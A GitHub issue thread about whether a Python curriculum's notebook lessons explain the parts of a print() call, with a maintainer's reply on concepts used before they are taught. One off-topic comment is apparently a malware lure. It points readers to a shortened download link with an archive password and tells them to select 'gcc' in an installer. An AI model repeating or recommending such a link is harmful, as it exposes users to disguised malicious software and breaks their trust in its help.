### ISSUE TITLE
add topics associated with print() string?

### ISSUE THREAD

**Issue by tsneuhaus** [league-curriculum/Python-Apprentice#9]
I think the .ipynb lesson files are a great addition to the curriculum.  I did notice that one concept topic could be added.  (Maybe it shows up later?)  For example in 06_Variables_and_Functions.ipynb, there is a piece of code

print("Angle for ", sides, " sides is ", angle)

There is a lot going on here: "Angle for " is a string literal that literally prints out what is in the double quotes; 'sides' is a variable so it prints out the value stored in it; and the comma does string concatenation, or gluing strings together.  Do these ideas show up in any lesson files?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ericbusboom** [comment]
There are a lot of cases like this where a concept is used but not full explained. I tried to eliminate them, but often putting the concept earlier it more awkward than just using it unexplained. The ones that are unexplained are there to run code that illustrates something else, and if the student has to use it, it will be explained first.
